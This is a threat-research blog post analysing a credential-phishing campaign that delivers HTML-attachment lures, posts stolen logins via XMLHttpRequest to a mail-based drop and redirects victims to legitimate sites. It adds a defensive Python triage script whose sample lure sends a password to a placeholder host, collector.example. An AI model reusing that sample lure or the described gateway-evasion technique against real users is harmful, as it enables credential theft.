Executive Summary
It all started when a colleague at Menlo Labs stumbled upon an open directory containing usernames and passwords. Looking at the rest of the web server's contents, we determined that the directory was the output of a single campaign. That campaign was fairly successful: it compromised the credentials of 164 users at various companies. We classify the activity described in this post as a Highly Evasive Adaptive Threat (HEAT), a class of attack built to slip past traditional security controls.
In the process of analyzing this kit, we came across a unique string “DH4 VIP3R L337.” This started our quest to understand more about this specific kit and actor.
The questions we sought to answer were:
- How many campaigns has this actor launched?
- Were they after a specific set of targets? Or was it a widespread effort to gather credentials?
- Who is behind this phishing kit?
- What are the TTPs?
Verticals successfully compromised
Technical Analysis
The attackers' modus operandi is to email an HTML attachment to their potential victims. Most secure email gateways (SEGs) block certain attachment types by default, but HTML attachments are generally exempt from that control, because many large financial firms deliver encrypted messages as HTML attachments that require the recipient to register an account before the message can be read. A phishing page delivered the same way is rendered locally from the attachment, so there is no link in the email for a URL reputation engine to score before the victim opens it.
The following screenshot (Figure 1) is an example of what gets displayed to the user when they open the malicious HTML attachment.
The attackers appear to select and customize their lures based on the services the target company uses. In total we identified 147 unique lures, ranging from cybersecurity vendors to financial services and everything in between.
The submitted credentials are sent to the attacker's command-and-control (C2) server with an XMLHttpRequest (AJAX) call. Thanks to JCyberSec, who shared the server-side code with us, we were able to reconstruct the entire attack chain and detail the campaign's capabilities. The kit handles the submitted credentials in an unusual way, described in the flow below.
The flow of the attack is as follows:
- Attackers send customized HTML attachment payloads to the victim(s).
- Once the victim(s) open the attachment, they are presented with a phishing page impersonating a service that they use.
- Once the victim clicks Submit, the form data is sent to the server-side handler, which decides where to send the browser next.
- What the kit treats as "validation" is not a check of the password against the impersonated service. The handler uses the PHPMailer library to email the victim's username and password to an attacker-controlled mailbox; whether that email is sent successfully is the only thing that gets "verified."
- If the email fails to send, the handler returns the JSON response {"msg":"errorsend"} to the browser, which then redirects the victim to the legitimate website of the impersonated brand. For the lure shown in Figure 1, the victim would land on proofpoint.com.
- If the email is sent successfully, the browser is redirected to a PDF hosted on Microsoft OneDrive. Either way the victim ends up on a legitimate domain, with nothing to suggest that the credentials have just been harvested.
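The steps above describe a pattern a mail-security team can hunt for in HTML attachments: a password field, an inline script that ships the form to an absolute URL with XMLHttpRequest or fetch, and a post-submit redirect to a legitimate-looking host. The following Python script is an added example written for this article, not code from Menlo Labs or from the kit. It pulls HTML attachments out of a raw message and applies those three checks; the sample message, the attachment name SecureMessage.html and the drop host collector.example are all constructed for the example, and the script body is modelled on the described flow rather than copied from the kit.

```python
"""Triage HTML e-mail attachments for the flow described above: a password form
whose inline script POSTs via XMLHttpRequest/fetch to an outside host, then
redirects the browser.  Example code for this article, not the kit's own."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")
XHR_RE = re.compile(r"XMLHttpRequest|\bfetch\s*\(|\$\.(?:ajax|post)\s*\(")
# location = "..." / location.href = "..." / location.replace("...") / location.assign("...")
REDIRECT_RE = re.compile(
    r"""location(?:\.href)?\s*=(?!=)\s*['"]([^'"]+)['"]|location\.(?:replace|assign)\(\s*['"]([^'"]+)['"]""")

class _Collector(HTMLParser):
    """Counts <input type=password> fields and gathers inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.password_fields, self.scripts, self._in_script = 0, [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def analyze_html(html: str) -> dict:
    """Indicators found in one HTML document, plus a verdict."""
    c = _Collector()
    c.feed(html)
    js = "\n".join(c.scripts)
    redirect_hosts = {urlparse(a or b).hostname for a, b in REDIRECT_RE.findall(js)} - {None}
    all_hosts = {urlparse(u).hostname for u in URL_RE.findall(js)} - {None}
    exfil_hosts = all_hosts - redirect_hosts  # contacted but never navigated to: the drop site
    uses_xhr = bool(XHR_RE.search(js))
    return {"password_fields": c.password_fields, "uses_xhr": uses_xhr,
            "exfil_hosts": sorted(exfil_hosts), "redirect_hosts": sorted(redirect_hosts),
            "suspicious": c.password_fields > 0 and uses_xhr and bool(exfil_hosts)}

def html_attachments(raw_eml: bytes):
    """Yield (filename, html_text) for each HTML attachment in a raw RFC 5322 message."""
    msg = message_from_bytes(raw_eml, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            body = part.get_content()
            if isinstance(body, bytes):  # e.g. shipped as application/octet-stream
                body = body.decode("utf-8", "replace")
            yield name, body

def triage_eml(raw_eml: bytes) -> dict:
    """Map attachment filename -> analysis for every HTML attachment in the message."""
    return {name: analyze_html(html) for name, html in html_attachments(raw_eml)}

# Constructed sample mimicking the described flow; collector.example is a placeholder host.
SAMPLE_HTML = """<html><body><h2>Secure Message</h2>
<form onsubmit="return go();"><input type="text" id="u" value="victim@example.com">
<input type="password" id="p"><button type="submit">Continue</button></form>
<script>
function go() {
  var x = new XMLHttpRequest();
  x.open("POST", "https://collector.example/post.php", true);
  x.onload = function () {
    if (JSON.parse(x.responseText).msg == "errorsend") { window.location.href = "https://www.proofpoint.com/"; }
    else { window.location.href = "https://onedrive.live.com/"; }
  };
  x.send("u=" + encodeURIComponent(document.getElementById("u").value) +
         "&p=" + encodeURIComponent(document.getElementById("p").value));
  return false;
}
</script></body></html>"""

def build_sample_eml() -> bytes:
    """Wrap SAMPLE_HTML in a constructed message the way the lure is delivered."""
    m = EmailMessage()
    m["From"], m["To"] = "secure-mail@example.net", "victim@example.com"
    m["Subject"] = "You have received a secure message"
    m.set_content("Open the attached file to view your encrypted message.")
    m.add_attachment(SAMPLE_HTML, subtype="html", filename="SecureMessage.html")
    return m.as_bytes()

if __name__ == "__main__":
    for name, result in triage_eml(build_sample_eml()).items():
        print(name, result)
```

The verdict keys on the combination, not on any single indicator: a legitimate secure-mail registration page also has a password field, but it posts to its own origin rather than to a third host that the page never navigates to. The checks are static and regex-based, so a kit that assembles its URLs at runtime or ships an encoded script body will pass them; treat a hit as a reason to detonate the attachment in isolation, not as the only control.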
We believe that the initial HTML attachments are created using a kit to automatically generate these HTML payloads. Menlo Labs researchers spent a significant amount of time looking for the kit, but were ultimately unable to locate it. If there are any researchers who are aware of such a kit, we would love to collaborate with them to understand how these payload generation kits function. However, until we have additional details, we are tracking this payload generation kit as VIP3R_L33T Generator.
Attacker Infrastructure Analysis
Most of the domains to which credentials were sent were registered through Namecheap. The registrar is inexpensive and offers registrants WHOIS privacy, which hides the details of who registered the domain.
The following monikers were used by the attackers:
- DH4 VIP3R L33T
- B4d BOI L33T
- ICQ Silentc0der
- *B0y
Conclusion
Credential phishing remains the number one attack we see across customers; every customer, across geographies and industry verticals, has been affected by this vector. Roughly 22 percent of the attacks we observe across our platform are credential phishing, and 7 percent of those go undetected by legacy URL reputation engines. These legacy URL reputation evasion techniques, dubbed LURE by the Menlo Labs research team, are one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT). The Menlo Labs team has observed a sharp uptick in HEAT attacks, which exploit our inherent cognitive biases to coax us into entering our credentials. That bias, combined with the tactics described above, makes these attacks very successful. Security awareness training helps reduce the impact of credential phishing, but corporate users should always be cautious when a page asks for personal or sensitive information, and especially when that page arrived as an email attachment rather than as a site they navigated to themselves.